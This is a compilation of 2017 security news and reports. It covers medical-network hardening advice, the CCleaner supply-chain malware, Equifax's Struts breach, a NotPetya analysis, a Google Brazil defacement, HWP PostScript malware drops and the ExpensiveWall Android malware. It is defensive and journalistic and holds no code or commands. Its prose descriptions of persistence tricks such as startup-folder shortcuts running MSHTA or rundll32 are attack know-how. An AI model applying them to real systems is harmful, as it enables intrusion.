Results that had been obtained during research that we discussed in a previous article called for a more detailed analysis of the security problem, but now from within medical institutions (with the consent of their owners, of course). The analysis allowed us to work on mistakes and give a series of recommendations for IT experts who service medical infrastructure.

Incorrect diagnosis is the first step to a fatal outcome
Providing data security in medicine is an issue that is more serious than it may seem at first glance. The most obvious scenario, which is the theft and reselling of medical data on the black market, does not seem as scary as the possibility of diagnostic data being modified by evildoers. Regardless of the goals of evildoers (extorting money from hospital owners or attacks targeted at specific patients), nothing good comes to patients as a result: after receiving incorrect data, doctors may prescribe the wrong course of treatment. Even if data substitution is detected in time, the normal operation of the medical institution may be disrupted, prompting the need to recheck all of the information stored on compromised equipment.

According to a report by the Centers for Disease Control and Prevention (CDC), the third leading cause of death in the USA comes from medical errors. Establishing a correct diagnosis depends on, aside from the qualification of a patient’s doctor, the correctness of data that is received from medical devices and stored on medical servers. This means that the resources for connected medicine produce an increased attraction for evildoers.

What is connected medicine?
This term refers to a large number of workstations, servers, and dedicated medical equipment that are connected to the network of a medical institution (a simplified model is shown in the figure below).
 

The network topology of connected medicine

Contemporary diagnostic devices can be connected to the LAN of an organization or to workstations through, for example, USB connections. Medical equipment quite often processes data (for example, a patient’s photographs) in DICOM format, which is an industry standard for images and documents. In order to store them and provide access to them from outside, PACSs (Picture Archiving and Communication Systems) are used, which can also be of interest to evildoers.

Recommendation #1: remove all nodes that process medical data from public access
It should be obvious that medical information should remain exclusively within the LAN of an institution. Currently, however, more than one thousand DICOM devices are in public access, which is confirmed by statistics obtained by using the Shodan search engine.
 

The geographical spread of DICOM devices (according to data from the Shodan search engine)

Generally, all types of PACS servers, which store information valuable to evildoers, are in public access. PACSs should be placed within the corporate perimeter, insulated from unauthorized use by third parties, and periodically backed up.

Recommendation #2: assign counter-intuitive names to resources
Even during the reconnaissance phase, attackers can obtain data that is important for an attack. So, for example, when enumerating available resources, they can find out the names of internal resources (servers and workstations) and thus determine which network nodes are useful to them and which ones are not.
 

Data about resources on the LAN of an organization that was obtained using open sources

To cite “interesting” resources as an example, let’s note database servers and other locations where medical information is collected. Aside from that, attackers may use obvious resource names to identify workstations with connected medial equipment.
 

An example of poor naming of internal resources on the LAN of a medical institution, which shows attackers where valuable data is kept

In order to make things harder for evildoers, obvious naming practices should be avoided. There are recommendations out there on how to name workstations and servers that have been compiled by competent organizations. We suggest that you take a look.

Follow
Denis Makrushin @difezza
Yes, naming policy can provide useful information about your infrastructure. Must read for medical facilities: https://www.rfc-editor.org/rfc/rfc8117.txt

1:11 PM - Mar 16, 2017
Replies Retweets 3 3 likes
Twitter Ads info and privacy
Recommendation #3: periodically update your installed software and remove unwanted applications
Evildoers may find many potential entry points when analyzing installed software on network nodes that process valuable information. In the example below, a workstation has several applications installed that have nothing to do with medicine (the W32.Mydoom worm and the Half-Life Engine game server). Additionally, that list has a series of applications that have critical vulnerabilities with published exploits.
 

An example of software installed on a workstation with connected medical equipment

One more example of such a careless approach is the installation of third-party software on a server that is responsible for the operation of the institution’s web portal, which allows doctors and patients to remotely access medical data.
 

A server with a tool for viewing DICOM images that has third-party software as well

In order to rule out the possibility of data access via third-party software, installed applications should be regularly inspected and updated. There should be no extra software on workstations with connected medical equipment.
 

An example of a vulnerable medical web portal that contains critical vulnerabilities that lead to medical data.

Recommendation #4: refrain from connecting expensive equipment to the main LAN of your organization
Medical devices used to help perform diagnoses and operations are very often expensive in terms of maintenance (for example, calibration), which requires significant financial investments from the owner.

An evildoer who gains access to equipment or a workstation with a connected device may:

exfiltrate medical data directly from the device;
spoof diagnostic information;
reset equipment settings, which will lead to unreliable data output or temporary incapacitation.
In order to gain access to data that is produced by the device, an evildoer only has to search for specific software.
 

An evildoer may isolate medical applications on the list of installed software on a workstation and modify operation parameters for medical equipment

To prevent unauthorized access to equipment, it is necessary to isolate all of the medical devices and workstations connected to them as a separate LAN segment and provide a means to carefully monitor events occurring in that segment (see also recommendation #5).

Recommendation #5: provide timely detection of malicious activity on your LAN
When there’s no opportunity to install a security solution directly on the device itself (sometimes warranties prohibit any modifications at the operating system level), alternative options for detecting and/or confounding evildoers should be found. We discussed one of these options in the article titled “Deceive in Order to Detect”.

The defending party may prepare a set of dedicated traps, which consist of LAN nodes that simulate medical equipment. Any unauthorized access to them may serve as a signal that someone has compromised the network and that the IT department of the medical institution should take appropriate action.

There are numerous methods for detecting malicious activity, and there is no sense in listing all of them as recommendations. Every IT department bases its choice of technology, products, and strategies for providing informational security on a large number of factors (the network size, resource priorities, available finances, etc.). Still, it is important to remember the main thing, which is that a lack of protection in medical infrastructure may cost the lives of patients.


Nebezpečné chyby ohrožují uživatele Windows

18.9.2017 Novinky/Bezpečnost Zranitelnosti
Hned několik kritických chyb bylo objeveno v produktech společnosti Microsoft. Týkají se samotného operačního systému Windows, případně jeho nedílných součástí, jako je rozhraní NET Framework. Chyby mohou zneužít počítačoví piráti k napadnutí cizího počítače.
Hned na úvod je nutné zdůraznit, že americký Microsoft již pro objevené chyby vydal mimořádné bezpečnostní záplaty. Uživatelé se tedy mohou relativně snadno bránit.

Celá řada uživatelů instalaci aktualizací podceňuje, a tak se počet nezáplatovaných strojů relativně snadno může vyšplhat až na několik miliónů. Právě takové stroje – tedy ty, které nemají nainstalované aktualizace – dávají jejich majitelé všanc počítačovým pirátům.

Převezmou kontrolu nad systémem
Chyby jsou obsaženy především v operačním sytému Windows Server 2008. Ten, jak už samotný název napovídá, je určen především pro serverové stanice. Na pozoru by se nicméně měli mít také uživatelé klasických počítačů – bezpečnostní trhliny totiž obsahuje i rozhraní NET Framework. A to se běžně používá také v desktopových verzích systému od amerického počítačového gigantu, například i v nejnovějších desítkách.

Všechny chyby mají nálepku kritické. To zjednodušeně znamená, že kvůli chybě mohou počítačoví piráti propašovat do napadeného systému prakticky libovolný škodlivý kód. Snadno tak mohou klidně i převzít kontrolu nad celým počítačem.

S instalací aktualizací by tak uživatelé neměli v žádném případě otálet. K dispozici jsou prostřednictvím služby Windows Update, která je nedílnou součástí operačního systému Windows.

Lidé, kteří využívají automatické aktualizace, se nemusí o nic starat.


CyberGRX Partners With BitSight to Address Supply Chain Risks
18.9.2017 securityweek Cyber
Partnership Integrates BitSight’s Security Ratings Capabilities With CyberGRX Third-Party Cyber Risk Exchange

The iconic Target breach of 2013 brought attention to the threat from third-party suppliers -- the supply chain. Target was breached after its HVAC supplier, Fazio Mechanical Services, had itself been breached and had the credentials for accessing its customer stolen.

This threat has become more difficult and more complex as digital transformation has increased and cloud service providers have boomed. A single enterprise can now use several thousand different cloud services. According to Gartner research, a large enterprise's network of vendors, partners, contractors and customers all with access to the corporate network can easily run into the tens of thousands. Any one of these can potentially introduce an unseen risk.

Managing this risk manually is impossible to do effectively -- and several specialist companies have evolved to provide various degrees of automation. SecurityScorecard and BitSight are two companies that provide analyses of third-party vendors by analyzing their external face.

CyberGRX (GRX stands for global risk exchange) takes a different approach -- it provides a 'risk exchange' based on a storehouse of validated third party risk assessments. According to CEO Fred Kneip, the firm is the brainchild of Jay Leek -- then at Blackstone. "Jay was thinking about the inefficiencies of third party risk management across his portfolio. In an ad-hoc survey of his portfolio companies, he found that 90 of his 115 portfolio companies were using the exact same vendor. Fifty of those were doing a full blown assessment of that vendor every year."

CyberGRX is the result of that observation. Rather than do 50 risk assessments of one vendor, do one assessment and share it across fifty companies. Where CyberGRX differs from SecurityScorecard and BitSight is that its risk assessments are internal rather than external affairs -- the former looks at processes and controls in relation to vulnerabilities, while the latter looks at the third-party's internet face.

CyberGRX and BitSight have now recognized the potential synergy between the two approaches.

On Monday they announced a partnership. "BitSight is a leader of the security ratings market, and their ability to continuously rate the security performance of third parties from an outside-in perspective will strengthen the CyberGRX Exchange," said Kneip. "Combining their proven non-intrusive approach to evaluating risk and security performance with the inside-out view our platform provides is a powerful proposition for customers: a comprehensive, continuous, 360-degree view of third-party cyber risk exposure."

"Enterprises today require access to accurate, continuous and actionable information about third-party cyber risk," added Jacob Olcott, VP of strategic partnerships at BitSight. "CyberGRX helps to solve that problem for companies across the world, and our security ratings provide the unique, objective data that organizations need to scale their third-party risk programs and make more informed business decisions."

CISOs now have somewhere to go to rate the risk associated with their supply chain without having to spend hours every day pouring over vendor-supplied spreadsheets or questionnaires; or ignoring the risk altogether through lack of time and manpower.

BitSight has raised more than $90 million in funding to-date, including $40 million in Series C financing in September 2016. Headquartered in Cambridge, Massachusetts, it was founded in 2011.

CyberGRX closed a $20M Series B funding round in April 2017. Headquartered in Denver, Colorado, it was founded in July 2016.


Threat Report Says 1 in 50 iOS Apps Could Leak Data
18.9.2017 securityweek Apple
A new global threat report for the mobile ecosystem shows that iOS provides a bigger threat than is often perceived. While the insecurities of the Android operating system are well-documented, the report notes that 1 in 50 iOS apps used in enterprise environments could potentially leak sensitive data.

Zimperium, a firm that provides next-gen machine learning endpoint protection for mobile devices, published its Global Threat Report Q2-2017 (PDF) on Friday.

During the second quarter -- April 1 to June 30, 2017 -- Zimperium's telemetry detected three specific threat categories to the mobile ecosystem. It describes them as device threats and risks (such as unpatched vulnerabilities), network threats (threats delivered via the cell network), and app threats (malware, spyware, adware and leaky apps on devices).

The threat from vulnerabilities in the iOS and Android operating systems has grown dramatically over the last few years. In 2014, there were fewer than 200 CVEs registered. By 2016, this had rocketed to around 600. This year (2017) there have already been more CVEs registered than for the whole of 2016.

iOS Apps Could Leak DataIt is not the operating systems becoming less secure -- it is more likely that both attackers and researchers are paying greater attention because of the increasing use of both iOS and Android in the corporate environment. "Cyber criminals are more likely to take the path of least resistance," notes the report, "and enterprise data is most vulnerable via mobile devices since most of time spent is away from secure networks, on public Wi-Fi and on apps that IT and security do not control or administer." It adds that "U.S. consumers now spend over 5 hours per day on mobile devices."

Unpatched vulnerabilities are as much a threat to mobile devices as they are to traditional devices. Unsurprisingly, given the fragmented nature of the Android market, Zimperium found that 94% of Android devices are using an outdated version of the OS. More surprising, however, is that 23% of iOS devices are also outdated. Despite the more timely and simple update process for iOS, Zimperium found that 1 in 5 Apple devices had not been updated 45 days after the update was readily available.

"The most concerning risks associated with iOS devices were malicious configuration profiles and 'leaky apps'," says Zimperium. These could ultimately allow a remote connection to control the device or siphon data without the user's knowledge.

The most serious of the network threats comes from man-in-the-middle (MITM) attacks. Zimperium's telemetry shows that 5% of all devices detected an attacker's reconnaissance scan, and that 80% of these subsequently received a MITM attack. "This is the most severe type of network attack," says the report, "since it is usually invisible to a user. Unless a user has a mobile threat defense app that can detect the attack on his/her device in real-time (e.g., zIPS), their wireless connection can be rerouted to a proxy and their data may be compromised."

While the threat of malicious apps and malware on the Android ecosystem is well-known and chronicled, Zimperium found that the iOS ecosphere should not be considered secure. Zimperium's machine-learning anomaly detection engine scanned 50,000 iOS applications present on enterprise users' iOS devices.

While it found that only 1% of the Apple devices had malware present, it found that nearly 1 in 5 devices had apps able to retrieve private information like passwords and the device's Unique Device Identifier, UDID. It also found that approximately 3% of the apps were using weak encryption or hashing algorithms -- like MD2 -- and are not considered secure to pass private, payment data or in-app purchases.

Zimperium found seven specific iOS app threats: malware; keychain sharing; MD2 encryption; private frameworks; private info URL; UDID reading; and the ability to read private information during a public USB recharge. It found that 2.2% of the analyzed apps have at least one of these issues. "This is a significant concern to enterprises since 1 of 50 apps is potentially leaking data to third parties," says Zimperium.

Zimperium has raised $60 million through several rounds of funding since the company was founded in 2010.


Microsoft Extends Office Bounty Program
18.9.2017 securityweek Safety
Microsoft has announced an extension to its Microsoft Office Bounty Program, which is now set to run until December 31, 2017.

Launched in mid-March 2017, the bounty program was initially set to run until June 15, 2017, promising payouts between $6,000 to $15,000, depending on the discovered vulnerability’s severity and type. The program was launched for Office Insider Builds on Windows.

Microsoft now says that researchers can submit their bug reports until December 31, 2017, and that the extension is retroactive for any cases submitted during the interim. The company is looking for issues in the Office Insider Builds, which provide users with early access to new Office capabilities and security innovations.

“The engagement we have had with the security community has been great and we are looking to continue that collaboration on the Office Insider Builds on Windows. This program represents a great chance to identify vulnerabilities prior to broad distribution,” Phillip Misner, Principal Security Group Manager, Microsoft Security Response Center, notes in a blog post.

Participating researchers can earn the maximum bug reward of $15,000 for vulnerabilities such as Elevation of privilege via Office Protected View sandbox escape; Macro execution by bypassing security policies to block Office macros in Word, Excel, and PowerPoint; and Code execution by bypassing Outlook’s automatic attachment block policies for a predefined set of extensions.

Only high quality reports on these types of vulnerabilities will be awarded the maximum payout. Low quality reports, the company says, won’t be awarded more than $9,000. Proof of concept is required for reports to be eligible, but a functioning exploit isn’t, Microsoft explains in the bounty program’s terms page.

Eligible submissions should identify “an original and previously unreported vulnerability in the current Office Insider build on a fully patched Windows 10 desktop,” the tech giant says. Submissions that can be reproduced on the previous build but not on the current aren’t considered eligible.

Microsoft also notes that “the first eligible external report received on an internally known issue under active development will receive a maximum of $1,500.”

Participating researchers should send their submissions to secure@microsoft.com.


Millions Download Maliciously Modified PC Utility
18.9.2017 securityweek Virus
Infected CCleaner Utility Highlights Dangers of Software Supply Chain Attacks

More than 2 million users are estimated to have downloaded a maliciously modified version of a software utility owned by antivirus firm Avast.

The affected application, CCleaner, helps users perform routine maintenance on their systems, and provides functionality such as temporary files deletion, performance optimization analysis, and application management. Developed by Piriform Ltd, which was acquired by Avast in July, the software had around 2 billion total downloads as of November 2016.

The infected CCleaner versions include 32-bit CCleaner v5.33.6162, released on August 15, and CCleaner Cloud v1.07.3191, which was released on August 24. The issue was discovered last week, nearly a month after the infected application was made available for download.

No information on how the compromise happened has been provided as of now, but Cisco Talos security researchers discovered that the infected CCleaner installers were signed with a valid certificate and were being hosted directly on CCleaner's download server.

“The presence of a valid digital signature on the malicious CCleaner binary may be indicative of a larger issue that resulted in portions of the development or signing process being compromised. Ideally this certificate should be revoked and untrusted moving forward,” Cisco says.

The installers were infected with a malware known as Floxif, and was modified in such a way to execute the malicious code during the legitimate application’s installation process. The malicious code includes steps designed to evade detection, and terminates execution if the user doesn’t have admin privileges. It also uses a Domain Generation Algorithm (DGA).

The malware was designed to gather various data from the infected systems, including computer name, IP address, list of installed software, list of active software, list of network adapters, and send it to a third-party server in the United States, Piriform reveals. According to the company, this non-sensitive type of data is the only data that was sent to the server.

Piriform also claims to have taken the necessary steps to ensure that its CCleaner v5.33.6162 and CCleaner Cloud v1.07.3191 users were safe, all while working with the U.S. law enforcement to shut down the server, which was accomplished on Sept. 15.

The company says it worked with download sites to remove CCleaner v5.33.6162, it pushed a notification to update CCleaner users to v5.34, and also automatically updated CCleaner Cloud users from v1.07.3191 to 1.07.3214, in addition to delivering an automatic update to Avast Antivirus users.

“At this stage, we don’t want to speculate how the unauthorized code appeared in the CCleaner software, where the attack originated from, how long it was being prepared and who stood behind it. The investigation is still ongoing,” Paul Yung, VP, Products, Piriform, notes in a technical post detailing the incident.

The company says that only around 3% of the CCleaner users have been impacted by the incident. In July, the application had over 130 million users worldwide, including 15 million Android users. Responding to an email inquiry from SecurityWeek, an Avast spokesperson said that an estimated 2.27 million users have downloaded the infected CCleaner iterations.

“We estimate that 2.27 million users had the v5.33.6162 software, and 5,010 users had the v1.07.3191 of CCleaner Cloud installed on 32-bit Windows machines. We believe that these users are safe now as our investigation indicates we were able to disarm the threat before it was able to do any harm,” the company’s official said.

While analyzing the domains associated with the infection, Cisco discovered an increase in activity following the August 15 release of the infected CCleaner variant. The company also notes that the antivirus detection for the threat was very low at the time of analysis.

Impacted users are advised to update to CCleaner v5.34 as soon as possible. They should also scan their systems with an anti-virus solution to remove any malicious code that might still be present. According to Cisco, users should consider restoring their machines to a state before August 15, 2017, or even perform a full reinstall.


Flaws Patched in Trend Micro Mobile Security for Enterprise
18.9.2017 securityweek Vulnerebility
A patch released last week by Trend Micro for its Mobile Security for Enterprise product resolves several vulnerabilities, including remote code execution issues rated critical and high severity.

Trend Micro Mobile Security for Enterprise is designed to provide organizations visibility and control over the mobile devices, applications and data used by their employees.

Researchers Steven Seeley of Offensive Security and Roberto Suggi Liverani discovered that the product is affected by unrestricted file upload, authentication bypass, SQL injection and proxy command injection vulnerabilities. The experts reported the security holes to Trend Micro via the security firm’s Zero Day Initiative (ZDI).

While there are only four types of vulnerabilities, ZDI published over 70 different advisories as each flaw affects more than one function.

The most severe issue, with a CVSS score of 9 or 10, is CVE-2017-14078, a SQL injection that allows authenticated and in some cases unauthenticated attackers to execute arbitrary code with SYSTEM privileges.

An authentication bypass vulnerability affecting Mobile Security for Enterprise, CVE-2017-14080, has been classified as high severity.

“The specific flaw exists within the initialization of the users table in the tmwf database. When processing an attempt to login a user by an email address, the system can bypass password authentication. An attacker can leverage this vulnerability to escalate privileges to those of an authenticated user,” ZDI said in its advisory.

An authenticated attacker can also execute arbitrary code by exploiting a medium severity flaw related to the modTMCSS Proxy functionality (CVE-2017-14081). Finally, an authenticated attacker can upload arbitrary files and execute code by abusing various file upload features that fail to properly validate user-supplied data (CVE-2017-14079).

The vulnerabilities were reported to the vendor in mid-May and they were patched last week with the release of versions 9.7 Patch 3.

Trend Micro pointed out that exploiting these vulnerabilities typically requires physical or remote access to a vulnerable system, but the company strongly encourages customers to apply the patch as soon as possible.


Equifax Shares More Details About Breach
18.9.2017 securityweek CyberCrime
Equifax has shared more details about the recent breach that affects roughly 143 million U.S. consumers, including how it discovered the unauthorized access and the number of individuals impacted by the incident in the United Kingdom.

The credit reporting agency announced on Friday that Chief Security Officer Susan Mauldin and Chief Information Officer David Webb had retired from the company effective immediately, and Russ Ayres and Mark Rohrwasser have been appointed interim CSO and CIO, respectively.

Many rushed to point out last week that Mauldin’s LinkedIn profile showed she was a music major with no background in cyber security or even technology. Mauldin has since made her profile private.

“Some people mock Equifax's CSO's music masters degree, however I doubt that many professional cybercriminals have any masters degree at all,” said Ilia Kolochenko, CEO of High-Tech Bridge. “Therefore I'd refrain from judging someone's skills only by his or her education. Only a scrupulous and rigorous investigation can point towards the people who should be responsible and liable for this disastrous breach.”

Equifax also revealed that the breach affected less than 400,000 U.K. consumers. Their data had been stored in the United States due to a “process failure” between 2011 and 2016. It’s still unclear how many Canadians are impacted by the breach.

The company discovered the intrusion on July 29 after its security team noticed suspicious traffic to a web application associated with its U.S. dispute portal. The suspicious traffic was blocked, but more unauthorized activity was detected the following day, which led to the decision to take the affected web app offline.

That was when Equifax’s security team discovered that the attackers had exploited an Apache Struts flaw to access its systems on May 13. The vulnerability in question, CVE-2017-5638, has been exploited in the wild since the first half of March.

Equifax said its team had known about the Struts vulnerability since it was disclosed and it took steps to patch systems. The organization is still reviewing the facts in an effort to determine why the dispute portal remained unpatched. FireEye-owned Mandiant has been called in to assist in conducting a comprehensive forensic investigation.

“The word patch is a bit inappropriate for this problem, since what Equifax would have had to do is replace the vulnerable Struts library with the latest one,” explained Jeff Williams, co-founder and CTO at Contrast Security. “Because this flaw has been in the Struts library for many years, there have been many other changes. That means that Equifax would have had significant rewriting to do in order to update. The process of rewriting, retesting, and redeploying can take months.”

“I think it’s outrageous that companies haven’t deployed the technology they need to protect applications from vulnerabilities during development and from attacks in operations,” Williams told SecurityWeek. “Companies that have been relying on legacy application security tools from the early 2000’s to protect their enterprise have a very false sense of their security. Those tools are simply too slow, inaccurate, and manual intensive to provide protection for modern applications and modern threats.”


ZLAB Malware Analysis Report: NotPetya
18.9.2017 securityweek Ransomware

I’m proud to share with you the first report produced by Z-Lab, the Malware Lab launched by the company CSE CybSec. Enjoy the Analysis Report NotPetya.
As most of you already know I have officially presented my new Co a couple of months ago, CybSec Enterprise is its name and we already started to work on strategic projects that we will reveal soon … meantime I apologize for the website that is still under construction.

We have already launched a malware Lab, let’s call it Z-Lab, composed by of group of skilled researchers and lead by Eng. Antonio Pirozzi.

It’s a pleasure for me to share with you one of the first analysis that we have recently conducted on the NotPetya Ransomware.

We have dissected the ransomware and discovered interesting details that are included in our report.

Below the abstract, the detailed report is available for free on our website.

Abstract
Due to the lack of updates performed by users on their machines, many threats spread out exploiting well-known vulnerabilities. This is what happened with the propagation of the NotPetya Ransomware, which infected a lot of users mostly in East Europe. This malware uses a famous exploit developed by NSA, Eternalblue, allowed by a vulnerability (MS17-010; CVE-2017-0143) in the Windows implementation of SMB protocol. The above-mentioned exploit was leaked in April 2017 and was used the first time with another malware, WannaCry, which caused more damage than NotPetya.

NotPetya’s could be confused with Petya ransomware (spread out in 2016) because of its behavior after the system reboot, but actually not because NotPetya is much more complex than the other one. In fact, Petya’s most known characteristic is the enciphering of the Windows MBR and MFT, instead, NotPetya propagates itself in the network as a worm.

notPetya

In the above figure, we have a scheme of the malware’s behavior. We can see that the first phase is the searching of a file representing a kill-switch, to avoid infecting machines already compromised. Next steps are referred to the actual infection, synthesized below:

Take disk control
Replace the original MBR with its own
Schedule reboot after an hour
Crypt user files and concurrently spread itself using Eternalblue exploit
After the reboot, the next step is the fake CHKDSK routine, very similar to Petya, where the malware enciphers the MFT. After that, we no longer have the characteristic Petya skull, but directly the screen with the ransom note, including the e-mail address of the malware writer and the relative Bitcoin address for the ransom payment.

You can download the full ZLAB Malware Analysis Report at the following URL:

http://csecybsec.com/download/zlab/NotPetya-report.pdf


The hacker Kuroi’SH defaced the official Google Brazil domain
18.9.2017 securityaffairs Hacking

A hacker using the online moniker of ‘Kuroi’SH’ defaced the Google Brazil domain on Tuesday afternoon, this isn’t the first high-profile target he breached.
A hacker using the online moniker of ‘Kuroi’SH’ defaced the official Google Brazil domain on Tuesday afternoon. The defaced page displayed a message greeting his friends for the successful attack on such a high-profile target.

“It is a great moment to die. Hacked by Kuroi’SH! Two Google at once, I don’t even care; f**k the jealous hates such as Nofawkx. Two Google at once world record idgaf :D. Greets to my friends Prosox & Shinobi h4xor.”

Below the deface page uploaded by the hacker and a video PoC of the hack:

Google Brazil defaced


Kuroi’SH successfully uploaded a deface page that remained on the domain for more than 30 minutes.

Kuroi’SH, who proclaims itself as “a half gray hat and white hat” explained that he was also able to control Google Paraguay but he didn’t have time to do it.

I reached Kuroi’SH to ask why he defaced the Google Brazil domain, he told me that it is a demonstrative hack to demonstrate that everything can be hacked.

He highlighted the importance of cyber security and the risks every company online face if underestimate cyber threats.

Google Brazil has also acknowledged the defacement, the company clarified that its systems were not hacker anyway.

“Google has not been hacked. DNS servers may have suffered an attack, redirecting to other sites.” states Google Brazil.

Follow
Google Brasil ✔@googlebrasil
O Google não foi hackeado. Servidores de DNS podem ter sofrido um ataque, redirecionando a outros sites. Sugestão: https://goo.gl/6icAam

9:06 PM - Jan 3, 2017
32 32 Replies 189 189 Retweets 223 223 likes
Twitter Ads info and privacy
Shortly after the attack, some Brazilian media outlets reported that hacker also defaced Google Maps and Google Translate domains, but Kuroi’SH has denied the involvement in other attacks.

My readers know very well Kuroi’SH, in 2015, he defaced NASA subdomains and published a pro-Palestinian message.

Such kind of attacks could be very dangerous because hackers targeting the DNS can redirect visitors to websites set up to deliver malware or to phishing websites … do not underestimate them!


Unpatched Windows Kernel Bug Could Help Malware Hinder Detection

18.9.2017 thehackernews Virus

A 17-year-old programming error has been discovered in Microsoft's Windows kernel that could prevent some security software from detecting malware at runtime when loaded into system memory.
The security issue, described by enSilo security researcher Omri Misgav, resides in the kernel routine "PsSetLoadImageNotifyRoutine," which apparently impacts all versions of Windows operating systems since Windows 2000.
Windows has a built-in API, called PsSetLoadImageNotifyRoutine, that helps programs monitor if any new module has been loaded into memory. Once registered, the program receives notification each time a module is loaded into memory. This notification includes the path to the module on disk.
However, Misgav found that due to "caching behaviour, along with the way the file-system driver maintains the file name and a severe coding error," the function doesn't always return the correct path of the loaded modules.
What's bad? It seems like Microsoft has no plans to address this issue, as the software giant does not consider it as a security vulnerability.
"This bug could have security implications for those who aren’t aware of its existence. We believe that if Microsoft does not plan on fixing this bug, they should at least explicitly warn developers about it in their documentation," says Tal Liberman, head of the research team at enSilo.
The researchers believe this "programmatic error" could theoretically be used by malware authors to bypass antivirus detection—especially those security products which rely on this API to check if any malicious code has been loaded into memory—using a "series of file operations" to mislead the scanning engine into looking at the wrong file.
So, if your endpoint detection and response products rely on this buggy API, you should either consider not using it or must implement the workaround introduced by the researcher to overcome the loophole.
In a separate blog post, Misgav advised software developers to use another Windows API (FltGetFileNameInformationUnsafe) to check the validity of the module's path using the file object parameter.
If the file exists, it is possible to verify that the file object being loaded into memory is indeed the same file that lies on disk.
For a more technical explanation, you can head on to enSilo's blog.
In separate news, security researchers from Check Point reported about a new attack technique, dubbed Bashware, which takes advantage of Windows built-in Linux subsystem to hide malware from the most security solutions.


Malware attacks leverage the Hangul Word Processor and PostScript to spread malware
18.9.2017 securityaffairs Virus

Experts at Trend Micro reported malware attacks that leveraged the Hangul Word Processor (HWP) word processing application to target users.
It has happened again, attackers leveraged the Hangul Word Processor (HWP) word processing application to target users in South Korea.

The application is very popular in South Korea and was exploited in several hacking campaigns against entities in the country.

In the recent attacks, hackers use the Hangul Word Processor in association with PostScript. The attackers use emails containing malicious attachments to deliver the malware.

“A branch of PostScript called Encapsulated PostScript exists, which adds restrictions to the code that may be run. This is supposed to make opening these documents safer, but unfortunately older HWP versions implement these restrictions improperly. We have started seeing malicious attachments that contain malicious PostScript, which is in turn being used to drop shortcuts (or actual malicious files) onto the affected system.” states the analysis published by Trend Micro.

Although the Encapsulated PostScript adds restrictions to secure the system while opening a document, the older HWP versions implement these restrictions improperly. The attackers have started using attachments containing malicious PostScript to drop shortcuts or malicious files onto the affected system.

Experts noticed that some of the subject lines and document names used by attackers include “Bitcoin” and “Financial Security Standardization”.

Hangul Word Processor

Researchers highlighted that attackers don’t use an actual exploit, but abuse a feature of PostScript to manipulate files.

PostScript doesn’t have the ability to execute shell commands, but attackers obtain a similar behavior by dropping files into various startup folders, then these files are executed when the user reboots the machine.

“Some of the ways we’ve seen this seen of this include:

Drops a shortcut in the startup folder, which executes MSHTA.exe to execute a Javascript file.
Drops a shortcut in startup folder and a DLL file in %Temp% directory. The shortcut calls rundll32.exe to execute the said DLL file.
Drops an executable file in the startup folder.
” reads the analysis.

One of the attacks observed by the researchers at Trend Micro would overwrite the file gswin32c.exe, which is the PostScript interpreter used by the Hangul Word Processor application. The file is replaced with a legitimate version of Calc.exe, in this way the attackers prevent the execution of other embedded PostScript content.

Newer versions of the Hangul Word Processor implement EPS properly, for this reason, users must upgrade the application to stay protected.

“Newer versions of the Hangul Word Processor implement EPS correctly, with the 2014 versions and later not being susceptible to this problem. We suggest upgrading to these newer, safer versions.” Trend Micro says.


Millions Download "ExpensiveWall" Malware via Google Play
18.9.2017 securityweek Android
A newly discovered Android malware that managed to infect at least 50 applications in Google Play has been downloaded between 1 million and 4.2 million times, Check Point researchers warn.

Dubbed ExpensiveWall, the threat was designed to send fraudulent premium SMS messages and to charge users’ accounts for fake services without their knowledge.

The total number of affected users, Check Point says, could be between 5.9 million and 21.1 million, as ExpensiveWall iw a variant of malware found in Google Play earlier this year. Unlike previous iterations, however, the new sample uses advanced obfuscation techniques to evade Google Play’s built-in anti-malware protections.

The first time the malware was detailed was in January 2017, when McAfee warned that a highly popular app called “I Love Filter” was in fact an SMS Trojan. The security researchers discovered that someone infected the free legitimate app Retro Live and that the Trojan would charge users via SMS messages while also leaking device and user information such as phone number, GPS location, installed apps, and IP address.

In a technical report describing the threat, Check Point reveals that this first variant of the malware wasn’t obfuscated. The security firm also notes that, while ExpensiveWall represents the obfuscated variant of the malware, there is also a third version that only contains the malicious code, but isn’t active.

“After analyzing different samples of the malware, Check Point mobile threat researchers believe ExpensiveWall is spread to different apps as an SDK called ‘gtk’, which developers embed in their own apps,” the researchers note.

ExpensiveWall was first observed on August 7, 2017. Check Point informed Google on it and the reported samples were removed from the store. Within days, another sample infiltrated Google Play and was downloaded more than 5,000 times before being removed.

The malware was designed to register victims to premium services without their knowledge, thus generating profits for its operators. However, the same infrastructure could easily be modified by other malware to spy on victims by capturing photos and recording audio, and even to steal sensitive data and send it to a command and control (C&C) server.

“Since the malware is capable of operating silently, all of this illicit activity takes place without the victim’s knowledge, turning it into the ultimate spying tool,” Check Point argues.

Once installed, ExpensiveWall requests several common permissions, such as Internet access, and SMS permissions. Given that many apps might request similar permissions, most users might grant them without questioning the app’s intentions, especially when installing from Google Play.

The malware then sends device data to its C&C server, including location and unique identifiers, such as MAC address, IP addresses, IMSI, and IMEI. Each time the device is switched on or its connectivity changes, the threat connects to the C&C to receive a URL.

The received page contains “malicious JavaScript code that can invoke in-app functions using JavascriptInterface, like subscribing them to premium services and sending SMS messages. The malware initiates the JavaScript code by silently clicking on the links in the webpage, in the same way it clicks on ads in other occasions,” the researchers explain.

After obtaining the device’s phone number, the malware uses it to subscribe the user to different paid services. While in some cases the activity is performed without notifying the user, in others the user is asked to click a “Continue” button to activate the subscription or send a premium SMS.

CheckPoint has provided a list of all infected applications detected to date. Users who might have installed any of them should manually uninstall the apps from their devices. Although Google removed the impacted software from Google Play, the infected devices haven’t been cleaned.


US Treasury announced sanctions against seven Iranian nationals and other entities
18.9.2017 securityaffairs BigBrothers

The U.S. Department of the Treasury’s Office of Foreign Assets Control (OFAC) sanctioned 11 entities and Iranian nationals for malicious cyber-enabled activity.
The U.S. Department of the Treasury’s Office of Foreign Assets Control (OFAC) sanctioned 11 entities and individuals for malicious cyber-enabled activity.
US Dept. of Treasury announced sanctions against 7 Iranian nationals and security firms for ‘malicious cyber-activity’ against US entities.

The seven Iranians were employed by ITSecTeam (ITSEC) and Mersad Company (MERSAD), both private companies were working for the Iranian government and the Islamic Revolutionary Guard.

The Iran’s Islamic Revolutionary Guard Corps, a branch of Iran’s Armed Forces founded after the Iranian Revolution on 5 May 1979.
The Iranian nationals were indicted by the US Department of Justice in early 2016, the US authorities charged seven Iranian hackers for attacking computer systems at banks and a dam in New York.

